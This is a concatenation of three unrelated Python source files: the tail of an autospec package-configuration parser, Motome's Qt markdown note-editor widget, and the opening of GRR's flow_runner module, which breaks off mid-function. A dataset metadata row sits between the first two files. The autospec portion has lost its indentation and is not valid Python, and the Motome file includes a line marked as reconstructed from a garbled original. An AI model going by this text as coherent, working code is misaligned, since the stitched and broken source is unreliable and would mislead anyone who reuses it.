print_warning("Already have a URL defined for {}: {}"
.format(version, self.parsed_versions[version]))
print_warning("Dropping {}, but you should check my work"
.format(url))
else:
self.parsed_versions[version] = url
if len(fields):
print_warning("Extra fields detected in `versions` file entry:\n{}"
.format(line))
print_warning("I'll delete them, but you should check my work")
# We'll combine what we just parsed from the versions file with any other
# versions that have already been defined, most likely the version actually
# provided in the Makefile's URL variable, so we don't drop any.
for version in self.parsed_versions:
self.versions[version] = self.parsed_versions[version]
return self.versions
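        # Example `versions` file (hypothetical content):
        #
        #   1.2.3   https://example.com/pkg-1.2.3.tar.gz
        #   1.2.2
        #
        # parses to {"1.2.3": "https://example.com/pkg-1.2.3.tar.gz", "1.2.2": ""}
        # and is merged into self.versions without dropping versions already known.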
def write_default_conf_file(self, name, wrapper, description):
"""Write default configuration file with description to file name."""
self.config_files.add(name)
filename = os.path.join(self.download_path, name)
if os.path.isfile(filename):
return
write_out(filename, wrapper.fill(description) + "\n")
def parse_config_files(self, bump, filemanager, version, requirements):
"""Parse the various configuration files that may exist in the package directory."""
packages_file = None
# Require autospec.conf for additional features
if os.path.exists(self.config_file):
config = configparser.ConfigParser(interpolation=None)
config.read(self.config_file)
if "autospec" not in config.sections():
print("Missing autospec section..")
sys.exit(1)
self.git_uri = config['autospec'].get('git', None)
self.license_fetch = config['autospec'].get('license_fetch', None)
self.license_show = config['autospec'].get('license_show', None)
packages_file = config['autospec'].get('packages_file', None)
self.yum_conf = config['autospec'].get('yum_conf', None)
self.failed_pattern_dir = config['autospec'].get('failed_pattern_dir', None)
# support reading the local files relative to config_file
if packages_file and not os.path.isabs(packages_file):
packages_file = os.path.join(os.path.dirname(self.config_file), packages_file)
if self.yum_conf and not os.path.isabs(self.yum_conf):
self.yum_conf = os.path.join(os.path.dirname(self.config_file), self.yum_conf)
if self.failed_pattern_dir and not os.path.isabs(self.failed_pattern_dir):
self.failed_pattern_dir = os.path.join(os.path.dirname(self.config_file), self.failed_pattern_dir)
if not packages_file:
print("Warning: Set [autospec][packages_file] path to package list file for "
"requires validation")
packages_file = os.path.join(os.path.dirname(self.config_file), "packages")
self.urlban = config['autospec'].get('urlban', None)
# Read values from options.conf (and deprecated files) and rewrite as necessary
self.read_config_opts()
if not self.git_uri:
print("Warning: Set [autospec][git] upstream template for remote git URI configuration")
if not self.license_fetch:
print("Warning: Set [autospec][license_fetch] uri for license fetch support")
if not self.license_show:
print("Warning: Set [autospec][license_show] uri for license link check support")
if not self.yum_conf:
print("Warning: Set [autospec][yum_conf] path to yum.conf file for whatrequires validation")
self.yum_conf = os.path.join(os.path.dirname(self.config_file), "image-creator/yum.conf")
if packages_file:
self.os_packages = set(self.read_conf_file(packages_file, track=False))
else:
self.os_packages = set(self.read_conf_file("~/packages", track=False))
wrapper = textwrap.TextWrapper()
wrapper.initial_indent = "# "
wrapper.subsequent_indent = "# "
self.write_default_conf_file("buildreq_ban", wrapper,
"This file contains build requirements that get picked up but are "
"undesirable. One entry per line, no whitespace.")
self.write_default_conf_file("pkgconfig_ban", wrapper,
"This file contains pkgconfig build requirements that get picked up but"
" are undesirable. One entry per line, no whitespace.")
self.write_default_conf_file("requires_ban", wrapper,
"This file contains runtime requirements that get picked up but are "
"undesirable. One entry per line, no whitespace.")
self.write_default_conf_file("buildreq_add", wrapper,
"This file contains additional build requirements that did not get "
"picked up automatically. One name per line, no whitespace.")
self.write_default_conf_file("pkgconfig_add", wrapper,
"This file contains additional pkgconfig build requirements that did "
"not get picked up automatically. One name per line, no whitespace.")
self.write_default_conf_file("requires_add", wrapper,
"This file contains additional runtime requirements that did not get "
"picked up automatically. One name per line, no whitespace.")
self.write_default_conf_file("excludes", wrapper,
"This file contains the output files that need %exclude. Full path "
"names, one per line.")
content = self.read_conf_file(os.path.join(self.download_path, "release"))
if content and content[0]:
r = int(content[0])
if bump:
r += 1
self.content.release = str(r)
print("Release :", self.content.release)
content = self.read_conf_file(os.path.join(self.download_path, "extra_sources"))
for source in content:
fields = source.split(maxsplit=1)
print("Adding additional source file: %s" % fields[0])
self.config_files.add(os.path.basename(fields[0]))
self.extra_sources.append(fields)
content = self.read_conf_file(os.path.join(self.download_path, "buildreq_ban"))
for banned in content:
print("Banning build requirement: %s." % banned)
requirements.banned_buildreqs.add(banned)
requirements.buildreqs.discard(banned)
requirements.buildreqs_cache.discard(banned)
content = self.read_conf_file(os.path.join(self.download_path, "pkgconfig_ban"))
for banned in content:
banned = "pkgconfig(%s)" % banned
print("Banning build requirement: %s." % banned)
requirements.banned_buildreqs.add(banned)
requirements.buildreqs.discard(banned)
requirements.buildreqs_cache.discard(banned)
content = self.read_conf_file(os.path.join(self.download_path, "buildreq_add"))
for extra in content:
print("Adding additional build requirement: %s." % extra)
requirements.add_buildreq(extra)
cache_file = os.path.join(self.download_path, "buildreq_cache")
content = self.read_conf_file(cache_file)
if content and content[0] == version:
for extra in content[1:]:
print("Adding additional build (cache) requirement: %s." % extra)
requirements.add_buildreq(extra)
else:
try:
os.unlink(cache_file)
except FileNotFoundError:
pass
except Exception as e:
print_warning(f"Unable to remove buildreq_cache file: {e}")
content = self.read_conf_file(os.path.join(self.download_path, "pkgconfig_add"))
for extra in content:
extra = "pkgconfig(%s)" % extra
print("Adding additional build requirement: %s." % extra)
requirements.add_buildreq(extra)
# Handle dynamic configuration files (per subpackage)
for fname in os.listdir(self.download_path):
if re.search(r'.+_requires_add$', fname):
subpkg = fname[:-len("_requires_add")]
self.process_requires_file(fname, requirements, 'add', subpkg)
elif re.search(r'.+_requires_ban$', fname):
subpkg = fname[:-len("_requires_ban")]
self.process_requires_file(fname, requirements, 'ban', subpkg)
elif fname == 'requires_add':
self.process_requires_file(fname, requirements, 'add')
elif fname == 'requires_ban':
self.process_requires_file(fname, requirements, 'ban')
elif re.search(r'.+_extras$', fname):
# Prefix all but blessed names with extras-
name = fname[:-len("_extras")]
if name not in ('dev', 'tests'):
name = f'extras-{name}'
self.process_extras_file(fname, name, filemanager)
elif fname == 'extras':
self.process_extras_file(fname, fname, filemanager)
content = self.read_conf_file(os.path.join(self.download_path, "excludes"))
for exclude in content:
print("%%exclude for: %s." % exclude)
filemanager.excludes += content
content = self.read_conf_file(os.path.join(self.download_path, "setuid"))
for suid in content:
print("setuid for : %s." % suid)
filemanager.setuid += content
content = self.read_conf_file(os.path.join(self.download_path, "attrs"))
for line in content:
attr = line.split()
filename = attr.pop()
print("%attr({0},{1},{2}) for: {3}".format(
attr[0], attr[1], attr[2], filename))
filemanager.attrs[filename] = attr
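        # Example `attrs` line (hypothetical): "0755 root root /usr/bin/tool"
        # yields filemanager.attrs["/usr/bin/tool"] = ["0755", "root", "root"],
        # later emitted as %attr(0755,root,root) for that file in the spec.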
self.patches += self.read_conf_file(os.path.join(self.download_path, "series"))
pfiles = [("%s/%s" % (self.download_path, x.split(" ")[0])) for x in self.patches]
cmd = "egrep \"(\+\+\+|\-\-\-).*((Makefile.am)|(aclocal.m4)|(configure.ac|configure.in))\" %s" % " ".join(pfiles) # noqa: W605
if self.patches and call(cmd,
check=False,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) == 0:
self.autoreconf = True
# Parse the version-specific patch lists
update_security_sensitive = False
for version in self.versions:
self.verpatches[version] = self.read_conf_file(os.path.join(self.download_path, '.'.join(['series', version])))
if any(p.lower().startswith('cve-') for p in self.verpatches[version]):
update_security_sensitive = True
if any(p.lower().startswith('cve-') for p in self.patches):
update_security_sensitive = True
if update_security_sensitive:
self.config_opts['security_sensitive'] = True
self.rewrite_config_opts()
content = self.read_conf_file(os.path.join(self.download_path, "configure"))
self.extra_configure = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure32"))
self.extra_configure32 = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure64"))
self.extra_configure64 = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure_avx2"))
self.extra_configure_avx2 = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure_avx512"))
self.extra_configure_avx512 = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "configure_openmpi"))
self.extra_configure_openmpi = " \\\n".join(content)
if self.config_opts["keepstatic"]:
self.disable_static = ""
if self.config_opts['broken_parallel_build']:
self.parallel_build = ""
content = self.read_conf_file(os.path.join(self.download_path, "make_args"))
if content:
self.extra_make = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "make32_args"))
if content:
self.extra32_make = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "make_install_args"))
if content:
self.extra_make_install = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "make32_install_args"))
if content:
self.extra_make32_install = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "install_macro"))
if content and content[0]:
self.install_macro = content[0]
content = self.read_conf_file(os.path.join(self.download_path, "cmake_args"))
if content:
self.extra_cmake = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "cmake_args_openmpi"))
if content:
self.extra_cmake_openmpi = " \\\n".join(content)
content = self.read_conf_file(os.path.join(self.download_path, "cmake_srcdir"))
if content and content[0]:
self.cmake_srcdir = content[0]
content = self.read_conf_file(os.path.join(self.download_path, "subdir"))
if content and content[0]:
self.subdir = content[0]
content = self.read_conf_file(os.path.join(self.download_path, "build_pattern"))
if content and content[0]:
self.set_build_pattern(content[0], 20)
self.autoreconf = False
content = self.read_script_file(os.path.join(self.download_path, "make_check_command"))
if content:
check.tests_config = '\n'.join(content)
content = self.read_conf_file(os.path.join(self.download_path, self.content.name + ".license"))
if content and content[0]:
words = content[0].split()
for word in words:
if word.find(":") < 0:
if not license.add_license(word, self.license_translations, self.license_blacklist):
print_warning("{}: blacklisted license {} ignored.".format(self.content.name + ".license", word))
content = self.read_conf_file(os.path.join(self.download_path, "golang_libpath"))
if content and content[0]:
self.content.golibpath = content[0]
print("golibpath : {}".format(self.content.golibpath))
if self.config_opts['use_clang']:
self.config_opts['funroll-loops'] = False
requirements.add_buildreq("llvm")
if self.config_opts['32bit']:
requirements.add_buildreq("glibc-libc32")
requirements.add_buildreq("glibc-dev32")
requirements.add_buildreq("gcc-dev32")
requirements.add_buildreq("gcc-libgcc32")
requirements.add_buildreq("gcc-libstdc++32")
if self.config_opts['openmpi']:
requirements.add_buildreq("openmpi-dev")
requirements.add_buildreq("modules")
# MPI testsuites generally require "openssh"
requirements.add_buildreq("openssh")
self.prep_prepend = self.read_script_file(os.path.join(self.download_path, "prep_prepend"))
if os.path.isfile(os.path.join(self.download_path, "prep_append")):
os.rename(os.path.join(self.download_path, "prep_append"), os.path.join(self.download_path, "build_prepend"))
self.make_prepend = self.read_script_file(os.path.join(self.download_path, "make_prepend"))
self.build_prepend = self.read_script_file(os.path.join(self.download_path, "build_prepend"))
self.build_append = self.read_script_file(os.path.join(self.download_path, "build_append"))
self.install_prepend = self.read_script_file(os.path.join(self.download_path, "install_prepend"))
if os.path.isfile(os.path.join(self.download_path, "make_install_append")):
os.rename(os.path.join(self.download_path, "make_install_append"), os.path.join(self.download_path, "install_append"))
self.install_append = self.read_script_file(os.path.join(self.download_path, "install_append"))
self.service_restart = self.read_conf_file(os.path.join(self.download_path, "service_restart"))
if self.config_opts['pgo']:
self.profile_payload = self.read_script_file(os.path.join(self.download_path, "profile_payload"))
self.custom_desc = self.read_conf_file(os.path.join(self.download_path, "description"))
self.custom_summ = self.read_conf_file(os.path.join(self.download_path, "summary"))
| gpl-3.0 | 8,387,312,896,066,715,000 | 49.406561 | 139 | 0.570372 | false |
akehrer/Motome | Motome/Models/MotomeTextBrowser.py | 1 | 13660 | # Import the future
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
# Import standard library modules
import cgi
import datetime
import logging
import mimetypes
import os
import re
import shutil
# Import Qt modules
from PySide import QtCore, QtGui
# Import configuration values
from Motome.config import HIGHLIGHT_COLOR, MEDIA_FOLDER, PLATFORM
from Motome.Models.Utils import safe_filename, grab_urls
# Set up the logger
logger = logging.getLogger(__name__)
class MotomeTextBrowser(QtGui.QTextBrowser):
"""Custom QTextBrowser for the Motome application"""
noteSaved = QtCore.Signal()
def __init__(self, parent):
super(MotomeTextBrowser, self).__init__(parent)
self.parent = parent
self.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)
self.setAcceptDrops(True)
self.setReadOnly(False)
self.setAcceptRichText(False)
self.setMouseTracking(True)
self.setOpenLinks(False)
self.setOpenExternalLinks(False)
self.setUndoRedoEnabled(True)
self.setTabChangesFocus(True)
self.setFrameShape(QtGui.QFrame.NoFrame)
# save file timer
self.save_interval = 1000 # msec
self.save_timer = QtCore.QTimer()
self.save_timer.timeout.connect(self.save_note)
        self.textChanged.connect(self.start_save)  # debounce saves via the timer
self.keyboard_shortcuts = {}
self.setup_keyboard_shortcuts()
@property
def notes_dir(self):
return self.parent.current_note.notedirectory
@property
def notemodel(self):
return self.parent.current_note
def setup_keyboard_shortcuts(self):
self.keyboard_shortcuts = {'Bold': {'seq': QtGui.QKeySequence('Ctrl+B'),
'func': lambda item=None: self.process_keyseq('ctrl_b')},
'Italic': {'seq': QtGui.QKeySequence('Ctrl+I'),
'func': lambda item=None: self.process_keyseq('ctrl_i')},
'H1': {'seq': QtGui.QKeySequence('Ctrl+1'),
'func': lambda item=None: self.process_keyseq('ctrl_1')},
'H2': {'seq': QtGui.QKeySequence('Ctrl+2'),
'func': lambda item=None: self.process_keyseq('ctrl_2')},
'H3': {'seq': QtGui.QKeySequence('Ctrl+3'),
'func': lambda item=None: self.process_keyseq('ctrl_3')},
'H4': {'seq': QtGui.QKeySequence('Ctrl+4'),
'func': lambda item=None: self.process_keyseq('ctrl_4')},
'H5': {'seq': QtGui.QKeySequence('Ctrl+5'),
'func': lambda item=None: self.process_keyseq('ctrl_5')},
'H6': {'seq': QtGui.QKeySequence('Ctrl+6'),
'func': lambda item=None: self.process_keyseq('ctrl_6')},
'InsLink': {'seq': QtGui.QKeySequence('Ctrl+K'),
'func': lambda item=None: self.process_insertseq('ctrl_k')},
'InsFile': {'seq': QtGui.QKeySequence('Ctrl+Shift+K'),
'func': lambda item=None: self.process_insertseq('ctrl_shift_k')}
}
for s in self.keyboard_shortcuts.values():
QtGui.QShortcut(s['seq'], self, s['func'])
def process_keyseq(self, seq):
cursor = self.textCursor()
example = False
start_pos = 0
end_pos = 0
if not cursor.hasSelection():
cursor.select(QtGui.QTextCursor.WordUnderCursor)
text = cursor.selectedText()
if text == '':
text = 'example text'
example = True
else:
text = cursor.selectedText()
if seq == 'ctrl_b':
cursor.insertText('**{0}**'.format(text))
if example:
start_pos = cursor.selectionEnd() - len(text) - 2
end_pos = start_pos + len(text)
elif seq == 'ctrl_i':
cursor.insertText('*{0}*'.format(text))
if example:
start_pos = cursor.selectionEnd() - len(text) - 1
end_pos = start_pos + len(text)
elif seq == 'ctrl_1':
cursor.insertText('# {0}\n'.format(text))
elif seq == 'ctrl_2':
cursor.insertText('## {0}\n'.format(text))
elif seq == 'ctrl_3':
cursor.insertText('### {0}\n'.format(text))
elif seq == 'ctrl_4':
cursor.insertText('#### {0}\n'.format(text))
elif seq == 'ctrl_5':
cursor.insertText('##### {0}\n'.format(text))
elif seq == 'ctrl_6':
cursor.insertText('###### {0}\n'.format(text))
else:
logger.info('No editor code for {0}'.format(seq))
if example:
if end_pos == 0:
start_pos = cursor.selectionEnd() - len(text)
end_pos = start_pos + len(text)
cursor.setPosition(start_pos)
cursor.setPosition(end_pos, QtGui.QTextCursor.KeepAnchor)
self.setTextCursor(cursor)
def process_insertseq(self, seq):
cursor = self.textCursor()
current_pos = cursor.position()
link_title = 'Title'
link_address = 'http://www.example.com'
if not cursor.hasSelection():
cursor.select(QtGui.QTextCursor.WordUnderCursor)
text = cursor.selectedText()
if text == '':
text = 'example text'
else:
link_title = cursor.selectedText()
if seq == 'ctrl_k':
self._insert_hyperlink(title=link_title)
elif seq == 'ctrl_shift_k':
filepath, _ = QtGui.QFileDialog.getOpenFileName(self, "Select File", os.path.expanduser('~'))
if filepath != '':
self._insert_filelink(filepath)
def event(self, event):
if (event.type() == QtCore.QEvent.KeyPress) and (event.key() == QtCore.Qt.Key_Tab):
            self.insertHtml('&nbsp;&nbsp;&nbsp;&nbsp;')  # render Tab as four non-breaking spaces
return True
return QtGui.QTextBrowser.event(self, event)
def set_note_text(self, content=None):
try:
if content is not None:
text = cgi.escape(content)
else:
text = cgi.escape(self.notemodel.content)
            text = text.replace('  ', '&nbsp; ')  # keep runs of spaces visible in the HTML view
link_pattern = r'\[([^\[]+)\]\(([^\)]+)\)'
link_transform = r'[\1](<a href="\2">\2</a>)'
linked_content = re.sub(link_pattern, link_transform, text)
intralink_pattern = r'\[\[([^\[]+)\]\]'
intralink_transform = r'[[<a href="\1">\1</a>]]'
intralink_content = re.sub(intralink_pattern, intralink_transform, linked_content)
self.setHtml(intralink_content.replace('\n', '<br />'))
self.setDocumentTitle(self.notemodel.title) # for things like print to pdf
except AttributeError:
self.setHtml('')
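    # Transform sketch (hypothetical note text): with the regexes above,
    #   "[GRR](http://example.com)"
    # becomes
    #   '[GRR](<a href="http://example.com">http://example.com</a>)'
    # and "[[Other Note]]" becomes '[[<a href="Other Note">Other Note</a>]]'
    # before newlines are converted to <br /> tags.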
def canInsertFromMimeData(self, source):
""" Capture pastes of files
http://stackoverflow.com/questions/15592581/pasting-qmimedata-to-another-windows-qtextedit
:param source:
:return:
"""
if source.hasImage():
return True
elif source.hasUrls():
return True
else:
return super(MotomeTextBrowser, self).canInsertFromMimeData(source)
def insertFromMimeData(self, source):
""" Capture pastes of files
http://stackoverflow.com/questions/15592581/pasting-qmimedata-to-another-windows-qtextedit
:param source:
:return:
"""
if source.hasImage():
image = source.imageData()
now = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
imagepath = os.path.join(self.notes_dir, MEDIA_FOLDER, now + '.png')
image.save(imagepath)
self._insert_filelink(imagepath)
elif source.hasUrls():
urls = source.urls()
self._insert_list_of_files(urls)
super(MotomeTextBrowser, self).insertFromMimeData(source)
def dragEnterEvent(self, e):
"""
Need to accept drag enter events
"""
e.accept()
def dropEvent(self, e):
"""
http://qt-project.org/wiki/Drag_and_Drop_of_files
"""
# dropped files are file:// urls
if e.mimeData().hasUrls():
self._insert_list_of_files(e.mimeData().urls())
def dragMoveEvent(self, e):
"""
Need to accept drag move events
http://qt-project.org/forums/viewthread/3093
"""
e.accept()
def start_save(self):
if self.save_timer.isActive():
self.save_timer.stop()
self.save_timer.start(self.save_interval)
def save_note(self):
if self.notemodel is None:
return
if self.save_timer.isActive():
self.save_timer.stop()
content = self.toPlainText()
self.notemodel.content = content
self.noteSaved.emit()
def highlight_search(self, query):
"""
Highlight all the search terms
http://www.qtcentre.org/threads/27005-QTextEdit-find-all
"""
current_cursor = self.textCursor()
extra_selections = []
for term in query:
self.moveCursor(QtGui.QTextCursor.Start)
while self.find(term):
extra = QtGui.QTextEdit.ExtraSelection()
extra.format.setBackground(HIGHLIGHT_COLOR)
extra.cursor = self.textCursor()
extra_selections.append(extra)
self.setExtraSelections(extra_selections)
self.setTextCursor(current_cursor)
def get_note_links(self):
# url_re_compile = re.compile(r'\[([^\[]+)\]\(([^\)]+)\)', re.VERBOSE | re.MULTILINE)
# return url_re_compile.findall(self.toPlainText())
return self.notemodel.urls
def _insert_list_of_files(self, file_list):
for filepath in file_list:
if filepath.isLocalFile():
if 'win32' in PLATFORM:
# mimedata path includes a leading slash that confuses copyfile on windows
# http://stackoverflow.com/questions/2144748/is-it-safe-to-use-sys-platform-win32-check-on-64-bit-python
fpath = filepath.path()[1:]
else:
# not windows
fpath = filepath.path()
self._insert_filelink(fpath)
def _insert_hyperlink(self, title=None):
cursor = self.textCursor()
current_pos = cursor.position()
if title is not None:
link_title = title
else:
link_title = 'Link Title'
link_address = 'http://www.example.com'
start_pos = current_pos + 1
end_pos = start_pos + len(link_title)
clipboard_text = QtGui.QClipboard().text()
if len(grab_urls(clipboard_text)) > 0:
link_address = clipboard_text
text, ret = QtGui.QInputDialog.getText(self, 'Insert Link', 'Link address:', QtGui.QLineEdit.Normal,
link_address)
if cursor.hasSelection():
start_pos = cursor.selectionEnd() + 3
end_pos = start_pos + len(link_address)
if ret:
if text != '':
link_address = text
cursor.insertHtml('[{0}](<a href="{1}">{1}</a>)'.format(link_title, link_address))
cursor.setPosition(start_pos)
cursor.setPosition(end_pos, QtGui.QTextCursor.KeepAnchor)
self.setTextCursor(cursor)
def _insert_filelink(self, filepath):
# create the media storage directory
try:
html_dir = os.path.join(self.notes_dir, MEDIA_FOLDER)
os.makedirs(html_dir)
except OSError:
# already there
pass
except AttributeError:
# notemodel is None
return
cursor = self.textCursor()
current_pos = cursor.position()
filename = safe_filename(os.path.basename(filepath))
dst_path = os.path.join(self.notes_dir, MEDIA_FOLDER, filename)
link_address = './{0}/{1}'.format(MEDIA_FOLDER, filename)
if cursor.hasSelection():
link_title = cursor.selectedText()
else:
link_title = filename
try:
is_image = 'image' in mimetypes.guess_type(filepath)[0]
except TypeError:
is_image = False
if is_image:
# user sent an image file
try:
shutil.copyfile(filepath, dst_path)
except (IOError, shutil.Error):
# file probably already there
pass
            # Markdown image syntax (reconstructed; the original snippet was garbled)
            self.insertHtml('![{0}](<a href="{1}">{1}</a>)'.format(link_title, link_address))
else:
try:
shutil.copyfile(filepath, dst_path)
except (IOError, shutil.Error):
# file probably already there
pass
self.insertHtml('[{0}](<a href="{1}">{1}</a>)'.format(link_title, link_address)) | bsd-2-clause | 8,148,224,664,488,367,000 | 36.53022 | 120 | 0.535359 | false |
destijl/grr | grr/lib/flow_runner.py | 1 | 47503 | #!/usr/bin/env python
"""This file contains a helper class for the flows.
This flow context class provides all the methods for handling flows (i.e.,
calling clients, changing state, ...).
Each flow must have a flow runner before it can be executed. The flow runner is
responsible for queuing messages and maintaining scheduling state (e.g. request
IDs, outstanding requests, quotas, etc.).
Runners form a tree structure: A top level runner has no parent, but child
runners have a parent. For example, when a flow calls CallFlow(), the runner
creates a new flow (with a child runner) and passes execution to the new
flow. The child flow's runner queues messages on its parent's message
queues. The top level flow runner ends up with all the messages for all its
children in its queues, and then flushes them all at once to the data
stores. The goal is to prevent child flows from sending messages to the data
store before their parent's messages since this will create a race condition
(for example a child's client requests may be answered before the parent). We
also need to ensure that client messages for child flows do not get queued until
the child flow itself has finished running and is stored into the data store.
The following is a summary of the CallFlow() sequence:
1. The top level flow runner has no parent_runner.
2. The flow calls self.CallFlow() which is delegated to the flow's runner's
CallFlow() method.
3. The flow runner calls StartFlow(). This creates a child flow and a new flow
runner. The new runner has as a parent the top level flow.
4. The child flow calls CallClient() which schedules some messages for the
client. Since its runner has a parent runner, the messages are queued on the
parent runner's message queues.
5. The child flow completes execution of its Start() method, and its state gets
stored in the data store.
6. Execution returns to the parent flow, which may also complete, and serialize
its state to the data store.
7. At this point the top level flow runner contains in its message queues all
messages from all child flows. It then syncs all its queues to the data store
at the same time. This guarantees that client messages from child flows are
scheduled after the child flow itself is serialized into the data store.
To manage the flow queues, we have a QueueManager object. The Queue manager
abstracts the accesses to the queue by maintaining internal queues of outgoing
messages and providing methods for retrieving requests and responses from the
queues. Each flow runner has a queue manager which is uses to manage the flow's
queues. Child flow runners all share their parent's queue manager.
"""
import threading
import traceback
import logging
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import events
# Note: OutputPluginDescriptor is also needed implicitly by FlowRunnerArgs
from grr.lib import output_plugin as output_plugin_lib
from grr.lib import queue_manager
from grr.lib import rdfvalue
from grr.lib import stats
from grr.lib import utils
from grr.lib.aff4_objects import multi_type_collection
from grr.lib.aff4_objects import sequential_collection
from grr.lib.aff4_objects import users as aff4_users
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import protodict as rdf_protodict
class FlowRunnerError(Exception):
"""Raised when there is an error during state transitions."""
class FlowLogCollection(sequential_collection.IndexedSequentialCollection):
RDF_TYPE = rdf_flows.FlowLog
# TODO(user): Another pickling issue. Remove this asap, this will
# break displaying old flows though so we will have to keep this
# around for a while.
FlowRunnerArgs = rdf_flows.FlowRunnerArgs # pylint: disable=invalid-name
RESULTS_SUFFIX = "Results"
RESULTS_PER_TYPE_SUFFIX = "ResultsPerType"
OUTPUT_PLUGIN_BASE_SUFFIX = "PluginOutput"
class FlowRunner(object):
"""The flow context class for hunts.
This is essentially the same as a normal context but it processes
all the requests that arrive regardless of any order such that one client that
doesn't respond does not make the whole hunt wait.
"""
def __init__(self, flow_obj, parent_runner=None, runner_args=None,
token=None):
"""Constructor for the Flow Runner.
Args:
flow_obj: The flow object this runner will run states for.
parent_runner: The parent runner of this runner.
runner_args: A FlowRunnerArgs() instance containing initial values. If not
specified, we use the runner_args from the flow_obj.
token: An instance of access_control.ACLToken security token.
"""
self.token = token or flow_obj.token
self.parent_runner = parent_runner
# If we have a parent runner, we use its queue manager.
if parent_runner is not None:
self.queue_manager = parent_runner.queue_manager
else:
# Otherwise we use a new queue manager.
self.queue_manager = queue_manager.QueueManager(token=self.token)
self.queued_replies = []
self.outbound_lock = threading.Lock()
self.flow_obj = flow_obj
# Initialize from a new runner args proto.
if runner_args is not None:
self.runner_args = runner_args
self.session_id = self.GetNewSessionID()
self.flow_obj.urn = self.session_id
# Flow state does not have a valid context, we need to create one.
self.context = self.InitializeContext(runner_args)
self.flow_obj.context = self.context
self.context.session_id = self.session_id
else:
# Retrieve args from the flow object's context. The flow object is
# responsible for storing our context, although they do not generally
# access it directly.
self.context = self.flow_obj.context
self.runner_args = self.flow_obj.runner_args
# Populate the flow object's urn with the session id.
self.flow_obj.urn = self.session_id = self.context.session_id
# Sent replies are cached so that they can be processed by output plugins
# when the flow is saved.
self.sent_replies = []
# If we're running a child flow and send_replies=True, but
# write_intermediate_results=False, we don't want to create an output
# collection object. We also only want to create it if runner_args are
# passed as a parameter, so that the new context is initialized.
#
# We can't create the collection as part of InitializeContext, as flow's
# urn is not known when InitializeContext runs.
if runner_args is not None and self.IsWritingResults():
with data_store.DB.GetMutationPool(token=self.token) as mutation_pool:
self.CreateCollections(mutation_pool)
def CreateCollections(self, mutation_pool):
logs_collection_urn = self._GetLogsCollectionURN(
self.runner_args.logs_collection_urn)
for urn, collection_type in [
(self.output_urn, sequential_collection.GeneralIndexedCollection),
(self.multi_type_output_urn, multi_type_collection.MultiTypeCollection),
(logs_collection_urn, FlowLogCollection),
]:
with aff4.FACTORY.Create(
urn,
collection_type,
mode="w",
mutation_pool=mutation_pool,
token=self.token):
pass
def IsWritingResults(self):
return (not self.parent_runner or not self.runner_args.send_replies or
self.runner_args.write_intermediate_results)
@property
def multi_type_output_urn(self):
return self.flow_obj.urn.Add(RESULTS_PER_TYPE_SUFFIX)
@property
def output_urn(self):
return self.flow_obj.urn.Add(RESULTS_SUFFIX)
def _GetLogsCollectionURN(self, logs_collection_urn):
if self.parent_runner is not None and not logs_collection_urn:
# We are a child runner, we should have been passed a
# logs_collection_urn
raise RuntimeError("Flow: %s has a parent %s but no logs_collection_urn"
" set." % (self.flow_obj.urn, self.parent_runner))
# If we weren't passed a collection urn, create one in our namespace.
return logs_collection_urn or self.flow_obj.urn.Add("Logs")
def OpenLogsCollection(self, logs_collection_urn, mode="w"):
"""Open the parent-flow logs collection for writing or create a new one.
If we receive a logs_collection_urn here it is being passed from the parent
flow runner into the new runner created by the flow object.
For a regular flow the call sequence is:
flow_runner --StartFlow--> flow object --CreateRunner--> (new) flow_runner
For a hunt the call sequence is:
hunt_runner --CallFlow--> flow_runner --StartFlow--> flow object
--CreateRunner--> (new) flow_runner
Args:
logs_collection_urn: RDFURN pointing to parent logs collection
mode: Mode to use for opening, "r", "w", or "rw".
Returns:
FlowLogCollection open with mode.
Raises:
RuntimeError: on parent missing logs_collection.
"""
return aff4.FACTORY.Create(
self._GetLogsCollectionURN(logs_collection_urn),
FlowLogCollection,
mode=mode,
object_exists=True,
token=self.token)
def InitializeContext(self, args):
"""Initializes the context of this flow."""
if args is None:
args = rdf_flows.FlowRunnerArgs()
output_plugins_states = []
for plugin_descriptor in args.output_plugins:
if not args.client_id:
self.Log("Not initializing output plugin %s as flow does not run on "
"the client.", plugin_descriptor.plugin_name)
continue
output_base_urn = self.session_id.Add(OUTPUT_PLUGIN_BASE_SUFFIX)
plugin_class = plugin_descriptor.GetPluginClass()
plugin = plugin_class(
self.output_urn,
args=plugin_descriptor.plugin_args,
output_base_urn=output_base_urn,
token=self.token)
try:
plugin.InitializeState()
# TODO(user): Those do not need to be inside the state, they
# could be part of the plugin descriptor.
plugin.state["logs"] = []
plugin.state["errors"] = []
output_plugins_states.append(
rdf_flows.OutputPluginState(
plugin_state=plugin.state, plugin_descriptor=plugin_descriptor))
except Exception as e: # pylint: disable=broad-except
logging.info("Plugin %s failed to initialize (%s), ignoring it.",
plugin, e)
parent_creator = None
if self.parent_runner:
parent_creator = self.parent_runner.context.creator
context = rdf_flows.FlowContext(
create_time=rdfvalue.RDFDatetime.Now(),
creator=parent_creator or self.token.username,
current_state="Start",
output_plugins_states=output_plugins_states,
remaining_cpu_quota=args.cpu_limit,
state=rdf_flows.FlowContext.State.RUNNING,
# Have we sent a notification to the user.
user_notified=False,)
return context
def GetNewSessionID(self):
"""Returns a random session ID for this flow based on the runner args.
Returns:
A formatted session id URN.
"""
# Calculate a new session id based on the flow args. Note that our caller
# can specify the base path to the session id, but they can not influence
# the exact session id we pick. This ensures that callers can not engineer a
# session id clash forcing us to overwrite an existing flow.
base = self.runner_args.base_session_id
if base is None:
base = self.runner_args.client_id or aff4.ROOT_URN
base = base.Add("flows")
